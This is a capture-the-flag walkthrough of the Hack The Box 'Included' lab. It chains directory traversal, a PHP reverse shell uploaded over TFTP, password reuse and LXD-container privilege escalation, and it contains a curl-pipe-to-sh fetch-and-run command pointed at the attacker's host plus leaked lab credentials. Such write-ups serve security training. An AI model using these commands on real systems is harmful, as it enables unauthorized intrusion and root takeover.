Included Walkthrough

After the Pathfinder Walkthrough, Here I'm with Included, so... let's hack and grab the flags.

As I mentioned before, the starting point machines are a series of 9 easily rated machines that should be rooted in sequence. So it means, if you need to go through this box, first of all you must have a complete Pathfinder machine.

Enough talks, 🥱 Let’s Get It Started 🐱‍💻

Disclaimers: No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedure to grab the flags! 🐱‍👤

00. Start Machine …

To start machine, just click "Join Machine".

Included

Then you can see the IP address for that machine. Usually it is 10.10.10.55 🤠

10.10.10.55

Before going enumeration steps we can simply ping to the IP address and check our VPN connection and whether the machine is alive. Sometimes the machines might "Disable" ping requests from passing through the firewall. But in most cases ping will be a success! 🙂

┌──(root💀hidd3nwiki)-[StartingPoints/Included]
└─# ping 10.10.10.55 -c 2
PING 10.10.10.55 (10.10.10.55) 56(84) bytes of data.
64 bytes from 10.10.10.55: icmp_seq=1 ttl=63 time=297 ms
64 bytes from 10.10.10.55: icmp_seq=2 ttl=63 time=321 ms

--- 10.10.10.55 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1000ms
rtt min/avg/max/mdev = 296.954/308.942/320.931/11.988 ms

As a ping result, It's TTL=63. There is only one route between machine and us (VPN). So definitely it will be a Linux machine.

01. Enumeration First …

01.1 Fast ports scan

As usual, run Nmap fast scan for all TCP ports to identify the ports which are open.

nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.55

-n  : Never do DNS resolution
-vv	: Extra verbosity
--open	: Output only open ports
-p-	: Full TCP ports range (65535)
-T4	: Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network

Here is the output 👇

┌──(root💀hidd3nwiki)-[StartingPoints/Included]
└─# nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.55
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-24 13:26 EDT
Initiating Ping Scan at 13:26
Scanning 10.10.10.55 [4 ports]
Completed Ping Scan at 13:26, 0.29s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:26
Scanning 10.10.10.55 [65535 ports]
Discovered open port 80/tcp on 10.10.10.55
SYN Stealth Scan Timing: About 47.58% done; ETC: 13:28 (0:00:34 remaining)
Completed SYN Stealth Scan at 13:28, 64.20s elapsed (65535 total ports)
Nmap scan report for 10.10.10.55
Host is up, received reset ttl 63 (0.22s latency).
Scanned at 2021-05-24 13:26:58 EDT for 65s
Not shown: 65534 closed ports
Reason: 65534 resets
PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 63

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 64.72 seconds
           Raw packets sent: 79376 (3.493MB) | Rcvd: 78517 (3.141MB)

So again we have only port 80 open.

01.2 Run Nmap Scripting Engine

To get the best result, we can run the Nmap Scripting Engine for all open ports. Now we know all of the open ports and therefore, we can point out and run the script engine as fast as possible.

┌──(root💀hidd3nwiki)-[StartingPoints/Included]
└─# nmap -sV -sC -oN DetailPorts.nmap -p 80 10.10.10.55                                                                                                                                                   130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-24 13:29 EDT
Nmap scan report for 10.10.10.55
Host is up (0.28s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.10.10.55/?file=index.php

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.54 seconds

We have only port 80 open here. Now you know what is next..

01.3 Discover more on port 80

Let's open web browser and check what is inside the port 80.

By looking at the URL, we can assume that we have some Directory Traversal vulnerability here. So let's check it.

Directory traversal (also known as file path traversal) is a web security vulnerability that allows an attacker to read arbitrary files on the server that is running an application. This might include application code and data, credentials for back-end systems, and sensitive operating system files. In some cases, an attacker might be able to write to arbitrary files on the server, allowing them to modify application data or behavior, and ultimately take full control of the server. source

We can easily check this using burp suite repeater tab. Let's power up burp suite and navigate to the site again.

As you can see we have Directory Traversal vulnerability. If we can upload any reverse shell script, we can call that file and get success by using this vulnerability. But do how we upload the reverse shell file? I tried so hard to find a way but I could not. 😥😥

Then I looked deeply at all the users which were available in the /etc/passwd using directory traversal vulnerability. You know what I found there? There is a user also in TFTP . Wait what.. How did we miss that port? 🤔🤔 Oh shoot! It's running on UDP port 69.

Let's run Nmap again and check whether that port is alive.

┌──(root💀hidd3nwiki)-[StartingPoints/Included]
└─# nmap -sU -p69 10.10.10.55
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-24 15:17 EDT
Nmap scan report for 10.10.10.55
Host is up (0.31s latency).

PORT   STATE         SERVICE
69/udp open|filtered tftp

Nmap done: 1 IP address (1 host up) scanned in 3.67 seconds

Yay!! It's alive. Let's try to connect to that service.

┌──(root💀hidd3nwiki)-[StartingPoints/Included]
└─# tftp 10.10.10.55
tftp> ?
Commands may be abbreviated.  Commands are:

connect         connect to remote tftp
mode            set file transfer mode
put             send file
get             receive file
quit            exit tftp
verbose         toggle verbose mode
trace           toggle packet tracing
status          show current status
binary          set mode to octet
ascii           set mode to netascii
rexmt           set per-packet retransmission timeout
timeout         set total retransmission timeout
?               print help information

Yes we can connect to that service and also we can upload any file using that service. Now we have an idea 💡💡. But how do I know the exact path where that file was stored in?

Again we can check that /etc/passwd file to get an idea about the home directory.

Fine! Now we know where my file will be located after I uploaded it to the TFTP.😋😋

02. Foothold

First we need to create PHP Reverse Shell. We can simply copy it from our kali webshell directory or using this site.

After editing the above sections you can copy that part of the code and paste it into the file.

Now, let's use TFTP and upload that file. Use put command to upload the file.

┌──(root💀hidd3nwiki)-[StartingPoints/Included]
└─# tftp 10.10.10.55
tftp> put hidd3nwiki.php 👈
Sent 2708 bytes in 2.2 seconds

Then let's fire up netcat listener and check that file using Directory Traversal vulnerability. The path to file location will be /var/lib/tftpboot/filename.php

We successfully landed a reverse shell as www-data, it's good spawn a TTY shell.

python3 -c "import pty; pty.spawn('/bin/bash')"

If you look around the /home directory, we have a user called mike. Since all these boxes are connected together, [I mean, passwords are reused] we can check using the passwords we found on Pathfinder walkthrough. Let's try to su mike

Yes! It was successful and we can grab the user flag using Sheffield19 Password. Now it's time to root flag. 😎😎

03. Privilege Escalation

When it comes to privilege escalations, we can manually check one by one or we can simply run any automation script to do the searching for us. Since this box is the Linux box we can use LinPEAS .

First we need to copy that script to our machine.

wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh

Then we can run python demon server to host that file from our end.

┌──(root💀hidd3nwiki)-[/home/…/Documents/HackTheBox/StartingPoints/Included]
└─# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Now we can use wget command to download that file to the Included box. But here, I'm not going to download it and run. Instead of that I use curl command to run that file directly.

curl http://<YourIP>:8000/inpeas.sh | sh 

We can identify interesting stuff by looking at the output file. 👇

As you can see the mike user is in the LXD group. LXD group is a high-privileged group in Linux system.

Here I found lxd/lxc Group - Privilege escalation script from hacktricks. And I'm going to go through the second method in that article.

First, Try to clone the following repository to your host and build an alpine image.

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

After you executed the build-alpine file, a tar.gx file should be created. File name will be different from my one.

Now we can upload it into the server by using python demon web server and download it through wget.

Now follow the article again. The following command will import the image and create privileged container with it.

lxc image import ./alpine*.tar.gz --alias myimage
lxc init myimage mycontainer -c security.privileged=true

Next we need to mount the /root into the image.

lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true

Now Let's interact with the container.

lxc start mycontainer 
lxc exec mycontainer /bin/sh

As you can see, we have landed on to the root shell. Now we can grab the root.txt file. It's located at /mnt/root/root/

root.txt

04. Post Exploitation

As you can see there is a login.sql file in the /mnt/root/root directory. Let's open it.

And it reveals credentials. Daniel : SNDv*2wzLWf

Okay... I’ll see you on the next box! 🙋‍♂️🙋‍♂️

Find me on @twitter